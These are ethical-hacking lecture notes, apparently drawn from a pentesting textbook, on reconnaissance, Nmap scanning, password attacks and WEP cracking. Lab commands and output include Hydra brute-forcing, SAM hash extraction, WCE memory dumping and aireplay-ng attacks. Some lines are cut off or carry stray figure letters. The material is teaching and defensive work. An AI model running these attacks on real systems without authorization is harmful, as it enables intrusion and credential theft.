UNIT V ETHICAL HACKING

Information Gathering-Open Source intelligence gathering-

Windows: Net craft- Linux: Who is Lookup-Password
attack-online password attacks-Offline password attacks-
wireless attacks.
Information Gathering
• Reconnaissance, also known as information gathering.
• the more time you spend collecting information on your target system.
• recon is also one of the most overlooked, underutilized, and
misunderstood steps in penetration testing (PT) methodologies today.
Types:
1.Active reconnaissance includes interacting directly with the target.
• It is important to note that during this process, the target may record our
IP address and log our activity.
2.Passive reconnaissance makes use of the vast amount of information
available on the web. It not interacting directly with the target System.
• While you are gathering information, it is important to keep your
data in a central location.
• To keep the information in electronic format. Digital records can be
easily sorted, edited, copied, imported, pruned, and mined.
• every hacker is a bit different and there are still some penetration
testers who prefer to print out all the information they gather.
• Each piece of paper is carefully cataloged and stored in a folder.
Open Source intelligence gathering

• Open source intelligence (or OSINT) is gathered from legal sources like
public records and social media.
• The success of a pentest often depends on the results of the
information-gathering phase.
Netcraft:the information that web servers and web-hosting companies
gather and make publicly available can tell you a lot about a website.
Netcraft also provides other services, and their antiphishing offerings
are of particular interest to information security
Whois Lookups

• All domain registrars keep records of the domains they host.

• These records contain information about the owner, including contact information.
• For example, if we run the Whois command line tool on our Kali machine to query for information about
bulbsecurity.com,
Syntax:
root@kali:~# whois bulbsecurity.com
Output:
• Registered through: GoDaddy.com, LLC (http://www.godaddy.com) Domain Name: BULBSECURITY.COM
• Created on: 21-Dec-11
• Expires on: 21-Dec-12
• Last Updated on: 21-Dec-11
• Registrant:
• u Domains By Proxy,
• LLC DomainsByProxy.com
• 14747 N Northsight Blvd Suite 111,
DNS Reconnaissance
• use Domain Name System (DNS) servers to learn more about a domain.
• DNS servers translate the human-readable URL www.bulbsecurity.com into an IP address.
• 1. Nslookup:
• Nslookup to find the mail servers for the same website by looking for MX records (DNS speak for
email) and displkay IP address of the website.
Syntax:
• root@kali:~# nslookup
• > set type=mx
• > bulbsecurity.com
• Server: 75.75.75.75
• Address: 75.75.75.75#53
• Non-authoritative answer: bulbsecurity.com
• mail exchanger = 40 ASPMX2.GOOGLEMAIL.com. bulbsecurity.com
• mail exchanger = 20 ALT1.ASPMX.L.GOOGLE.com. bulbsecurity.com
•
2. Host
• Host for the name servers for a domain with the command
host -t ns domain.
a domain set up to demonstrate zone transfer vulnerabilities, as shown
here.
Syntax:
root@kali:~# host -t ns zoneedit.com
Output:
zoneedit.com name server ns4.zoneedit.com.
zoneedit.com name server ns3.zoneedit.com.
3. Zone Transfers

• DNS zone transfers allow name servers to replicate all the entries about a domain.
When setting up DNS servers, you typically have a primary name server and a backup
server.
• many system administrators set up DNS zone transfers insecurely, so that anyone can
transfer the DNS records for a domain.
zoneedit.com is an example of such a domain, and we can use the host command to
download all of its DNS records. Use the -l option to specify the domain to transfer, and
choose one of the name servers from the previous command.
• Searching for Email Addresses
• use a Python tool called theHarvester to quickly scour thousands of search engine
results for possible email addresses. theHarvester can automate searching Google,
Bing, PGP, LinkedIn, and others for email addresses.
• ./theharvester.py –d syngress.com -l 10 -b google.
• This command will search for e-mails, sub domains, and hosts that
belong to syngress.com shows our results.
• “./theHarvester.py” is used to invoke the tool.
• A lowercase “d” is used to specify the target domain.
• A lowercase “l” (that is an L not an 1) is used to limit the number of
results returned to us.
• The tool was instructed to return only 10 results.
• The “b” is used to specify what public repository we want to search.
• Harvester output

• root@kali:~# theharvester -d bulbsecurity.com -l 500 -b all

• *******************************************************************
• **
• * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
• * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
• * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
• * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
• **
• * TheHarvester Ver. 2.2a *
• * Coded by Christian Martorella *
• * Edge-Security Research *
• * [email protected] *
• *******************************************************************
• Full harvest..
• [-] Searching in Google..
• Searching 0 results...
• Searching 100 results...
• Searching 200 results...
• Searching 300 results...
• --snip--
Maltego
• In Kali Linux, the maltego command initiates the Maltego application,
a tool used for information gathering and analysis, particularly within
the context of open-source intelligence (OSINT) and cybersecurity
investigations.
• Maltego is a graphical application that allows users to explore and
visualize relationships between various online entities like people,
organizations, websites, and IP addresses.
• Under All Transforms, choose the To DNS Name – MX (mail server) transform.
Port Scanning
• Port scanning is a cybersecurity technique used to identify open ports on a target
host or network, revealing potential vulnerabilities and services.
• It's a common tool for both attackers and defenders, with attackers using it to find
entry points and security professionals using it to assess and strengthen defenses.
Manual Port scanning
• the manually connecting to ports with a tool such as telnet or Netcat and
recording the results. Let’s use Netcat to connect to the Windows XP machine on
port 25, the default port for the Simple Mail Transfer Protocol (SMTP).

root@kali:~# nc -vv 192.168.20.10 25

nc: 192.168.20.10 (192.168.20.10) 25 [smtp] open
nc: using stream socket
nc: using buffer size 8192
nc: read 66 bytes from remote
220 bookxp SMTP Server SLmail 5.5.0.4433 Ready
ESMTP spoken here
Port Scanning with Nmap
• Nmap is an industry standard for port scanning.
• Nmap results might instead say that every host is alive, and will be listening on every port if
your scan is detected.
A SYN Scan
• A SYN scan is a TCP scan that does not finish the TCP handshake. A TCP connection starts with a
three-way handshake: SYN 4 SYN-ACK 4 ACK.
In a SYN scan, Nmap sends the SYN and waits for the SYN-ACK if the port is open but never sends
the ACK to complete the connection.
If the SYN packet receives no SYN-ACK response, the port is not available; eitherit’s closed or the
connection is being filtered.
The syntax for a SYN scan is the -sS flag.
• use the -o option to output our Nmap results to a file.
• The -oA option tells Nmap to log our results in all formats: .nmap, .gnmap (greppable Nmap),
and XML.
• Nmap format, like the output that Nmap formatted and easy to read.
• Greppable Nmap (as the name implies) is formatted to be used with the grep utility to search for
specific information.
• XML format is a standard used to import Nmap results into other tools
• This basic Nmap scan has already helped us focus our pentesting efforts.
• Both the Windows XP and Linux targets are running FTP servers , web servers , and
SMB servers . The Windows XP machine is also running a mail server that has opened
several ports and a MySQL server .
A Version Scan
• Our SYN scan was stealthy, but it didn’t tell us much about the software that is actually
running on the listening ports.
• Nmap completes the connection and then attempts to determine what software is
running and, if possible, the version, using techniques such as banner grabbing.
• root@kali:~# nmap -sV 192.168.20.10-12 -oA bookversionnmap
• Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-18 08:29 EST
• Nmap scan report for 192.168.20.10
• Host is up (0.00046s latency).
• Not shown: 991 closed ports
• PORT STATE SERVICE VERSION
• 21/tcp open ftp FileZilla ftpd 0.9.32 beta
• 25/tcp open smtp SLmail smtpd 5.5.0.4433
• 79/tcp open finger SLMail fingerd
• 80/tcp open http Apache httpd 2.2.12 ((Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k
• mod_autoindex_color PHP/5.3.0 mod_perl/2.0.4 Perl/v5.10.0)
• 106/tcp open pop3pw SLMail pop3pw
• 110/tcp open pop3 BVRP Software SLMAIL pop3d
• 135/tcp open msrpc Microsoft Windows RPC
• 139/tcp open netbios-ssn
• 443/tcp open ssl/http Apache httpd 2.2.12 ((Win32) DAV/2 mod_ssl/2.2.12 OpenSSL/0.9.8k
UDP scan
• UDP scan (-sU), Nmap sends a UDP packet to a port. Depending on the port, the packet sent is protocol
specific. If it receives a response, theport is considered open.
• If the port is closed, Nmap will receive an ICMP Port Unreachable message. If Nmap receives no response
whatsoever, then either the port is open and the program listening does not respond to Nmap’s query, or the
traffic is being filtered.
UDP scan example.
root@kali:~# nmap -sU 192.168.20.10-12 -oA bookudp
• Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-18 08:39 EST
• Stats: 0:11:43 elapsed; 0 hosts completed (3 up), 3 undergoing UDP Scan
• UDP Scan Timing: About 89.42% done; ETC: 08:52 (0:01:23 remaining)
• Nmap scan report for 192.168.20.10
• Host is up (0.00027s latency).
• Not shown: 990 closed ports
• PORT STATE SERVICE
• 69/udp open|filtered tftp u
• 123/udp open ntp
• 135/udp open msrpc
• 137/udp open netbios-ns
• 138/udp open|filtered netbios-dgm
Scanning a Specific Port

• Nmap scans only the 1,000 ports it considers the most “interesting,” not the 65,535
possible TCP or UDP ports. The default Nmap scan will catch common running services,
but in some cases it will miss a listening port or two.
• To scan specific ports, use the -p flag with Nmap. For example, to scan port 3232 on
the Windows XP target.
Syntyax:
root@Kali:~# nmap -sS -p 3232 192.168.20.10
• Starting Nmap 6.40 ( http://nmap.org ) at 2015-12-18 09:03 EST
• Nmap scan report for 192.168.20.10
• Host is up (0.00031s latency).
• PORT STATE SERVICE
• 3232/tcp open unknown
• MAC Address: 00:0C:29:A5:C1:24 (VMware)
Password attacks
• Password attacks aim to gain unauthorized access by compromising
user credentials.
• Widely used in cyberattacks, leading to data breaches and system
intrusions.
• Can be categorized into online and offline attacks.
Password Management

• Many organizations use biometric (fingerprint or retinal scan-based) or two-factor authentication to

mitigate these risks.
• Even web services such as Gmail and Dropbox offer two-factor authentication in which the user
provides a password as well as a second value, such as the digits on an electronic token.
• If two-factor authentication is not available, using strong passwords is imperative for account
security because all that stands between the attacker and sensitive data may come down to a simple
string.
• Strong passwords are long, use characters from multiple complexity classes, and are not based on a
dictionary word.
• Organizations can force users to create strong passwords, but as passwords become more complex,
they become harder to remember.
• passwords that can be discovered lying around in plaintext undermine the security of using a strong
password.
• Another cardinal sin of good password management is using the same password on many sites.
• Password management presents a difficult problem for IT staff and will likely continue to be a fruitful
avenue for attackers unless or until password based authentication is phased out entirely in favor of
another model.
Online Password Attacks
• Wordlists
• Guessing Usernames and Passwords with Hydra
Offline Password Attacks
• Recovering Password Hashes from a Windows SAM File
• Dumping Password Hashes with Physical Access
• LM vs. NTLM Hashing Algorithms .
• The Trouble with LM Password Hashes
• John the Ripper
• Cracking Linux Passwords .
• Cracking Configuration File Passwords .
• Rainbow Tables .
• Online Password-Cracking Services
• Dumping Plaintext Passwords from Memory with Windows Credential Editor .
On line password attack
• Attacker interacts directly with a live authentication system.
• Attempts to guess the correct password through repeated login
attempts.
• Limited by system protections such as account lockouts and rate-
limiting.
Wordlists

• User Lists
• When creating a user list, first try to determine the client’s username scheme.
• If a company uses a first initial followed by a last name for the username scheme, and
they have
• an employee named John Smith, jsmith is likely a valid username
Use command:
root@kali:~# cat userlist.txt
Output:
• georgia
• john
• mom
• james
Password Lists

• Use command:
root@kali:~# cat passwordfile.txt
Output:
• password
• Password
• password1
• Password1
• Password123
• Password123
tool like the ceWL custom wordlist
• educated guesses based on information you gather about employees online.
Information about spouses, children, pets, and hobbies may put you on the
right track.
• In addition to making educated guesses based on information you gather
while performing reconnaissance, a tool like the ceWL custom wordlist
generator will search a company website for words to add to your wordlist.
• Use command:
• root@kali:~# cewl –help
• The command ceWL --help lists ceWL’s usage instructions. Use the –d (depth)
option u to specify how many links ceWL should follow on the
• target website. If you think that your target has a minimum password-size
requirement, you might specify a minimum word length to match with the -m
option . output ceWL’s results to a file with the -w option .
•
Tool Crunch
• Another method for creating wordlists is producing a list of every possible combination of a given
set of characters, or a list of every combination of characters for a specified number of characters.
• The tool Crunch in Kali will generate these character sets for you.
Use command
root@kali:~# crunch 7 7 AB
Output:
• Crunch will now generate the following amount of data: 1024 bytes
• Crunch will now generate the following number of lines: 128
• AAAAAAA
• AAAAAAB
• --snip—
• the default Crunch character set of lowercase letters. This technique is known as keyspace brute-
forcing. While it is not feasible to try every possible combination of characters for a password in
the span of your natural life, it is possible to try specific subsets.
Guessing Usernames and Passwords with Hydra

• Hydra is an online password-guessing tool that can be used to test usernames and
passwords for running services.
• Use command
root@kali:~# hydra -L userlist.txt -P passwordfile.txt 192.168.20.10 pop3
output
• Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
• Hydra (http://www.thc.org/thc-hydra) starting at 2015-01-12 15:29:26
• [DATA] 16 tasks, 1 server, 24 login tries (l:4/p:6), ~1 try per task
• [DATA] attacking service pop3 on port 110
• [110][pop3] host: 192.168.20.10 login: georgia password: passwordu
• [STATUS] attack finished for 192.168.20.10 (waiting for children to finish)
• 1 of 1 target successfuly completed, 1 valid password found
• Hydra (http://www.thc.org/thc-hydra) finished at 2015-01-12 15:29:48
Hydra tool
• use Hydra to guess usernames and passwords by running through our username and password
files to search for valid POP3 credentials on our Windows XP target.
• This command uses the –L flag to specify the username file, the -P for the password list file, and
specifies the protocol pop3.
Specific user password track command:
• we can use the -l flag instead of -L to specify one particular username.
Use command:
root@kali:~# hydra -l georgia -P passwordfile.txt 192.168.20.10 pop3
Output:
• Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only
• [DATA] 16 tasks, 1 server, 24 login tries (l:4/p:6), ~1 try per task
• [DATA] attacking service pop3 on port 110
• [110][pop3] host: 192.168.20.10 login: georgia password: passwordu
• [STATUS] attack finished for 192.168.20.10 (waiting for children to finish)
• 1 of 1 target successfuly completed, 1 valid password found
•
Using Netcat to log in with guessed credentials

• Hydra can perform online password guessing against a range of services.

• Use the credentials found with Hydra to log in with Netcat.

• Use command
root@kali:~# nc 192.168.20.10 pop3
Output:
• +OK POP3 server xpvictim.com ready <[email protected]>
• Password Attacks 203
• USER georgia
• +OK georgia welcome here
• PASS password
• +OK mailbox for georgia has 0 messages (0 octets)
On line password attack types
• Brute Force Attack: Tries all possible password combinations.
• use tools designed for automating online password attacks or guessing passwords until the server
responds with a successful login. These tools use a technique called brute forcing.
• Tools that use brute forcing try every possible username and password combination, and given
enough time, they will find valid credentials.
• Dictionary Attack: Uses a predefined list of common passwords.
• Credential Stuffing: Leverages leaked credentials from other breaches.
• Phishing: Tricks users into revealing their passwords
Offline password attack
• Performed after obtaining a stolen copy of the password database.
• Conducted without interacting with the live system.
• Faster and more efficient due to lack of real-time restrictions.
• Another way to crack passwords (without being discovered) is to get a copy of the password
hashes and attempt to reverse them back to plaintext passwords.
• guess a password, hash it with the one-way hash function, and compare the result to the known
hash. If the two hashes are the same, we’ve found the correct password.
• Windows XP system via the windows/smb/ms08_067_netapi
• Metasploit module, we can use the hashdump Meterpreter command to print the hashed Windows
passwords.
• Save the output of the hashdump to a file called xphashes.txt, which we will use in “John the
Ripper”
• Not e
1.Recovering Password Hashes from a Windows
SAM File

• The SAM file stores hashed Windows passwords.

• Use command:
root@bt:~# cat sam
• The SAM file is obfuscated because the Windows Syskey utility encrypts the password hashes
inside the SAM file with 128-bit Rivest Cipher 4 (RC4) to provide additional security.
• Even if an attacker or pentester can gain access to the SAM file, there’s a bit more work to do
before we can recover the password hashes.
• need a key to reverse the encrypted hashes.
• The encryption key for the Syskey utility is called the bootkey, and it’s stored in the Windows
SYSTEM file.
• use a tool in Kali called Bkhive to extract the Syskey utility’s bootkey from the SYSTEM file so
we can decrypt the hashes.
• Use command:
root@kali:~# bkhive system xpkey.txt
Output:
• bkhive 1.1.1 by Objectif Securite
• http://www.objectif-securite.ch
• original author: [email protected]
• Bootkey: 015777ab072930b22020b999557f42d5

• the first argument and extracting the file to xpkey.txt.

• Once we have the bootkey, we can use Samdump2 to retrieve the password hashes from the SAM
file, Pass Samdump2 the location of the SAM file and the bootkey from Bkhive as arguments, and
it will use the bootkey to decrypt the hashes.
• compare these hashes to those found with the hashdump command in an active Meterpreter
session.
2. Dumping Password Hashes with Physical Access
• While having physical access may not appear very useful at first, you may be able to access the password hashes by
restarting a system using a Linux Live CD to bypass security controls.
• Our Windows 7 virtual machine, dump its hashes using a physical attack.
• First, we’ll point our virtual machine’s optical driveto a Kali ISO file, In Vmware Player, highlight your Windows 7 virtual
machine, right-click it and choose Settings, then choose CD/DVD (SATA) and point to the ISO in the Use ISO Image field
on the right side of the page.
• 1. On your host machine, browse to where you saved your virtual machines.Then, in the folder for the Windows 7 target,
find the .vmx configuration file, and open it in a text editor
2.Add the line bios.bootdelay = 3000 anywhere in the file. This tells the virtual machine to delay booting for 3000 ms, or
three seconds, enough time for us to change the boot options.
• 3. Save the .vmx file, and restart the Windows 7 target. Once you can access the BIOS, choose to boot from the CD drive.
The virtual machine should start the Kali ISO. Even though we’re booted into Kali, we can mount the Windows hard disk
and access files, bypassing the security features of the Windows operating system.
Use command:
• root@kali:# mkdir -p /mnt/sda1
• root@kali:# mount /dev/sda1 /mnt/sda1
• root@kali:# cd /mnt/sda1/Windows/System32/config/
• root@kali:/mnt/sda1/Windows/System32/config bkhive SYSTEM out
• root@kali:/mnt/sda1/Windows/System32/config samdump2 SAM out
• samdump2 1.1.1 by Objectif Securite
• http://www.objectif-securite.ch
• original author: [email protected]
• Root Key : CMI-CreateHive{899121E8-11D8-41B6-ACEB-301713D5ED8C}
• Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c5
9d7e0c089c0:::
• Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c
089c0:::
• Georgia
Weidman:1000:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd
830b75B6c:::
3. LM vs. NTLM Hashing
Algorithms
• LM Hash was the primary way to hash passwords on Microsoft Windows up to Windows NT, but
it’s a cryptographically unsound method that makes it possible to discover the correct plaintext
password for an LM hash, regardless of a password’s length and complexity.
• Microsoft introduced NTLM hashing to replace LM hash, but on Windows XP, passwords are stored
in both LM and NTLM formats by default.
• For Example Compares the two password hash entries. The first one belongs to the Administrator
account on Windows XP, which we found with hashdump in Meterpreter, and the second is
Georgia Weidman’s account from Windows 7, which we found with physical access.
Output:
• 1.Administrator : 2.500: 3.e52cac67419a9a224a3b108f3fa6cb6d :
4.8846f7eaee8fb117ad06bdd830b7586c
• 1.Georgia Weidmanu:2.1000: 3.aad3b435b51404eeaad3b435b51404eew:
4.8846f7eaee8fb117ad06bdd830b7586c

• The first field in the hashes is the username ; the second is the user ID ; the third is the
password hash in LAN Manager (LM) format ; and the fourth is the NT LAN Manager (NTLM)
hash x.
• both passwords are the string password, the NTLM hash entries for each account are identical,
but the LM hash fields are different.
• LM-hashed password can be brute-forced in minutes to hours. crack the NTLM hashes will
depend on both our ability to guess and the length and complexity of the password.
4.The Trouble with LM Password Hashes

• Run a plaintext password guess through the cryptographic hashing function and compare the results to the
hash we’re trying to crack; if they’re the same, we’ve found the correct password.
The following issues contribute to the insecurity of LM hashes:
• Passwords are truncated at 14 characters.
• Passwords are converted to all uppercase.
• Passwords of fewer than 14 characters are null-padded to 14 characters.
• The 14-character password is broken into two seven-character passwords that are hashed separately.
Different format of passwords
Consider the following password as different format
1. T3LF23!+?sRty$J
• This password has 15 characters from four classes, including lowercase letters,
uppercase letters, numbers, and symbols, and it’s not based on a dictionary word.
• the LM hash algorithm, the password is truncated to 14 characters like this:
T3LF23!+?sRty$
2. Then the lowercase letters are changed to uppercase:
T3LF23!+?SRTY$
3.Next, the password is spl Next, the password is split into two seven-character
parts.
The two parts are then used as keys to encrypt the static string KGS!@#$% using
the Data Encryption Standard (DES) encryption algorithm:
• T3LF23! +?SRTY$
The resulting eight-character ciphertexts from the encryption are thenconcatenated
to make the LM hash.
5.John the Ripper tool
• One of the more popular tools for cracking passwords is John the Ripper.
• John the Ripper cracks the seven-character password hashes.
• The default mode for John the Ripper is brute forcing. Because the set of possible plaintext passwords in LM hash is
so limited, brute forcing is a viable method for cracking any LM hash in a reasonable amount of time, even with our
Kali virtual machine, which has limited CPU power and memory.
• Use command
root@kali: john xphashes.txt
Output:
• root@kali: john xphashes.txt
• Warning: detected hash type "lm", but the string is also recognized as "nt"
• Use the "--format=nt" option to force loading these as that type instead
• Loaded 10 password hashes with no different salts (LM DES [128/128 BS SSE2])
• (SUPPORT_388945a0)
• PASSWOR (secret:1)
• (Guest)
• PASSWOR (georgia:1)
• PASSWOR (Administrator:1)
• D (georgia:2)
• D (Administrator:2)
• D123 (secret:2)
Cracking Linux Passwords

• Using John Riper to crack Linux password as following command

root@kali# cat linuxpasswords.txt

Output:
• georgia:$1$CNp3mty6$lRWcT0/PVYpDKwyaWWkSg/:15640:0:99999:7:::
• root@kali# johnlinuxpasswords.txt --wordlist=passwordfile.txt
• Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 4x])
• password (georgia)
• guesses: 1 time: 0:00:00:00 DONE (Sun Jan 11 05:05:31 2015) c/s: 100
• trying: password - Password123
MD5 can’t be brute-forced in a reasonable amount of time.
• use a wordlist with the --wordlist option in John the Ripper. John the Ripper’s success at
cracking the password depends on the inclusion of the correct password in our wordlist.
Cracking Configuration File Passwords

• the MD5 hashed passwords we found in the FileZilla FTP server configuration file we
downloaded with the Zervit 0.4 file inclusion vulnerability.
• The administrator of this system forgot to change the default password for the built-in
FTP account.
Rainbow Tables
• Rainbow tables typically hold every possible hash entry for a given algorithm up to a
certain length with a limited character set.
• For example, you may have a rainbow table for MD5 hashes that contains all entries
that are all lowercase letters and numbers with lengths between one and nine.
• This table is about 80 GB— A full set of LM hash rainbow tables is about 32 GB.
• The tool Rcrack in Kali can be used to sift through the rainbow tables for the
correct plaintext.
Online Password-Cracking Services

• Set up up your own high-powered machines in the cloud, create your own wordlists,
and so on, but there are also online services that will take care of this for you for a fee.
• For example, https://www.cloudcracker.com/ can crack NTLM Windows hashes, SHA-
512 for Linux, WPA2 handshakes for wireless, and more. You simply upload your
password hash file, and the cracker does the rest.

Dumping Plaintext Passwords from Memory with Windows Credential Editor

• Windows Credential Editor tool to an exploited target system, and it will pull
plaintext passwords from the LocalSecurity Authority Subsystem Service (LSASS)
process in charge of enforcing the system’s security policy.
• download the latest version of WCE from
http://www.ampliasecurity.com/research/wcefaq.html.
Command for WCE

C:\>wce.exe –w
output
• wce.exe -w
• WCE v1.42beta (Windows Credentials Editor) - (c) 2010-2013 Amplia Security - by Hernan
Ochoa
• ([email protected])
• Use -h for help.
• georgia\BOOKXP:password

• WCE found the plaintext of the user georgia’s password.

• The downside to this attack is that it requires a logged-in user for the password to be stored
in memory. Even if you were able to get a plaintext password or two with this method, it is
still worth dumping and attempting to crack any password hashes you can access.
Common Types of Offline
Attacks
Brute Force: Exhaustive password search using powerful hardware.
Dictionary Attack: Attempts passwords from a wordlist against stored
hashes.
Rainbow Table Attack: Uses precomputed hash values for quick
matches.
• Hybrid Attack: Combines dictionary words with variations (e.g.,
“pass123”).
Prevention Strategies
Use strong, complex, and unique passwords.
Implement Multi-Factor Authentication (MFA).
Limit login attempts and implement CAPTCHA.
Encrypt and salt stored passwords using secure algorithms.
• Monitor for unusual login activities and data leaks.
Wireless attacks
• Wireless attacks in cyber security are types of cyberattacks that
specifically target wireless networks or devices connected through
wireless communication.
• These attacks exploit the vulnerabilities of Wi-Fi, Bluetooth,or other
wireless protocols.
Types:
• Wired Equivalent Privacy .
• Wi-Fi Protected Access
• WPA2 .
• Wi-Fi Protected Setup
Viewing Available Wireless
Interfaces
• After attaching the Alfa wireless card to the Kali virtual machine, enter iwconfig to see the wireless
interfaces available on your virtual machine.
• Scan for Access Points
• The command iwlist wlan0 scan will scan for nearby access points using the wlan0 interface.
• monitor mode
• monitor mode allows us to see additional wireless traffic on top of the traffic intended for our wireless card.
monitor mode by entering airmon-ng check command
• enter airmon-ng start wlan0 to switch the wireless interface into monitor mode. To kill all interfering
processes in one step, enter airmon-ng check kill.
• Capturing Packets: enter the command Airodump-ng to use the wireless interface in monitor mode
mon0.
• Command:root@kali:~# airodump-ng mon0 --channel 6
Output:
• CH 6 ][ Elapsed: 28 s ][ 2015-05-19 20:08
• BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
• 00:23:69:F5:B4:2Bu -30 53 2 0 6 54 . OPNv linksysw
Output-
• The Airodump-ng output gathers information about the wireless packets, including the
base service set identification (BSSID), which is the base station’s MAC address u.
• We also see additional information such as the encryption algorithm used for wireless
security v and the Service Set Identification (SSID) w. Airodump-ng also picks up the
MAC addresses of connected clients x and the MAC address of my host machine
attached to the wireless access point.
Open Wireless
• Open wireless networks are a real disaster from a security perspective because anyone
within antenna range of the access point can connect to that network.
• While open networks could require authentication after connection,and some do, many
just let anyone connect.
• Sensitive data may be secured by protocols like SSL, but that’s not always the case.
• For instance, FTP traffic on an open wireless network is completely unencrypted,
including login information, and we don’t even need to use ARP or DNS cache poisoning
to capture the packets.
• Any wireless card in monitor mode will be able to see the unencrypted traffic.
Wired Equivalent Privacy

• Many routers that come with encryption enabled use older encryption called wired equivalent
privacy (WEP) by default.
• The fundamental problem with WEP is that flaws in its algorithm make it possible for an
attacker to
• recover any WEP key. WEP uses the Rivest Cipher 4 (RC4) stream cipher and a pre-shared
key.
• Anyone who wants to connect to the network can use the same key, made up of a string of
hexadecimal digits, for both encryption and decryption.
• The plaintext (unencrypted) data undergoes an exclusive or (XOR) bitwise operation with the
keystream to create encrypted cipher text.
• The bitwise XOR operation has four possibilities:
• 0 XOR 0 = 0
• 1 XOR 0 = 1
• 0 XOR 1 = 1
• 1 XOR 1 = 0
WEP decryption
• The zeros and ones in the bitstream in Figures 15-2 and 15-3 can represent any data
being sent over the network. Figure 15-2 shows how the plaintext I XORed with the
keystream to create the ciphertext.
Plaintext: 101101100000111100101010001000...
Keystream: 110001101011100100011100110100...
Ciphertext: 011100001011011100100110001100...
• Figure 15-2: WEP encryption
When decrypted, the same keystream is XORed against the ciphertext to restore the
original plaintext, as shown in Figure 15-3.
Ciphertext: 011100001011011100100110001100...
Keystream: 110001101011100100011100110100...
Plaintext: 101101100000111100101010001000...
• Figure 15-3: The shared WEP key can be either 64 or 148 bits
• The shared WEP key can be either 64 or 148 bits.
• In either case, an initialization vector (IV) makes up the first 24 bits of the key to add
randomness,making the effective key length really only 40 or 104 bits.
• Adding randomness with an IV is common in cryptographic systems because if the same
key is used repeatedly, attackers can examine the resulting ciphertext for patterns and
potentially break the encryption.
• The IV and key are concatenated, then run through a key-scheduling algorithm (KSA) and a
pseudorandom number generator (PRNG) to createthe keystream.
• Next, an integrity check value (ICV) is computed and concatenated with the plaintext before
encryption
• in order to prevent attackers from intercepting the ciphertexts, flipping some bits, and
changing the resulting decrypted plaintext to something malicious or, at least, misleading.
• The plaintext is then XORed with the keystream (as shown in Figure 15-2). The resulting
packet is made up of the IV, the ICV, the ciphertext, and a two-bit key ID, as shown in Figure
15-4.
• Decryption is similar, The IV and key (denoted by the key ID), stored in
plaintext as part of the packet, are concatenated and run through the same
key-scheduling algorithm and pseudorandom number generators to create a
keystream identical to the one used for encryption.
• The ciphertext is then XORed with the keystream to reveal the plaintext and
the ICV.
• Finally, the decrypted ICV is compared with the plaintext ICV value appended
to the packet. If the values don’t match, the packet is thrown out.
 WEP Weaknesses
•Static Shared Key:
WEP uses a single key for all devices on the network, making it vulnerable to attackers w
the key.
•RC4 Algorithm Weakness:
The RC4 algorithm used in WEP has known vulnerabilities, making it susceptible to variou
•IV Collisions:
WEP's relatively short IVs (24 bits) can lead to collisions, allowing attackers to recover the
•Lack of Mutual Authentication:
WEP lacks mutual authentication, meaning devices can't verify the identity of the access
to man-in-the-middle attacks.
•Optional Use:
The use of WEP was optional, leading to many devices not having it enabled, further incre
•Poor Key Management:
WEP's key management mechanisms were weak, and some implementations reused the
security.
•Tools for Cracking:
Numerous tools, like AirSnort, are available to crack WEP keys, making it easy for attacke
•Susceptibility to ARP Spoofing:
WEP's vulnerabilities enable Address Resolution Protocol (ARP) spoofing attacks, allowing
Cracking WEP Keys with
Aircrack-ng
• There are multiple ways to crack WEP keys, including the fake authentication attack, fragmentation
attack, chopchop attack, caffé latte attack, and PTW attack.
• authentication attack, which requires at least one legitimate client connected to the access point.
• Command:
• Airodump-ng to use the wireless interface in monitor mode mon0, and use the -w flag to save all
packets to a file.
root@kali:~# airodump-ng -w book mon0 --channel 6
• CH 6 ][ Elapsed: 20 s ][ 2015-03-06 19:08
• BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
• 00:23:69:F5:B4:2Bu -53 22 6 0 6v 54 . WEPw WEP linksysx
• BSSID STATION PWR Rate Lost Frames Pro

• Base Station MAC Address: 00:23:69:F5:B4:2B

• SSID: linksys
• Channel: 6
Injecting Packets with fake authentication

Use command:
root@kali:~# aireplay-ng -1 0 -e linksys -a 00:23:69:F5:B4:2B -h 00:C0:CA:1B:69:AA mon0
We fake authentication using the following flags with their associated data:
• -1 tells Aireplay-ng to fake authentication.
• 0 is the retransmission time.
• -e is the SSID; in my case linksys.
• -a is the MAC address of the access point we want to authenticate with. -h is the MAC address of
our card (which should be on a sticker on the
• device).mon0 is the interface to use for the fake authentication. After sending the Aireplay-ng
request, you should receive a smiley face and indication that authentication was successful u.

Output:
• 20:02:56 Waiting for beacon frame (BSSID: 00:23:69:F5:B4:2B) on channel 6
• 20:02:56 Sending Authentication Request (Open System) [ACK]
• 20:02:56 Authentication successful
• 20:02:56 Sending Association Request [ACK]
Generating an ARP Request

• To generate an ARP request, we’ll use the host system as a simulated client by pinging
an IP address on the network from the connected host system.
• Aireplay-ng will see the ARP request and retransmit it to the access point over and
over.
• the Airodump-ng screen the #Data number, indicating captured IVs, increases
rapidly as Aireplay-ng
• continues to retransmit the ARP packet, causing the access point to generatemore IVs.

• output
• CH 6 ][ Elapsed: 14 mins ][ 2015-11-22 20:31
• BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
• 00:23:69:F5:B4:2B -63 92 5740 85143u 389 6 54 . WEP WEP OPN linksys
Generating IVs with the ARP Request Relay Attack

• Use the command

root@kali:~# aireplay-ng -3 -b 00:23:69:F5:B4:2B -h 00:C0:CA:1B:69:AA mon0
Output:
• 20:14:21 Waiting for beacon frame (BSSID: 00:23:69:F5:B4:2B) on channel 6
• Saving ARP requests in replay_arp-1142-201521.cap
• You should also start airodump-ng to capture replies.
• Read 541 packets (got 0 ARP requests and 0 ACKs), sent 0 packets...(0 pps)
We use these options:
• -3 performs the ARP request replay attack.
• -b is the base station MAC address.
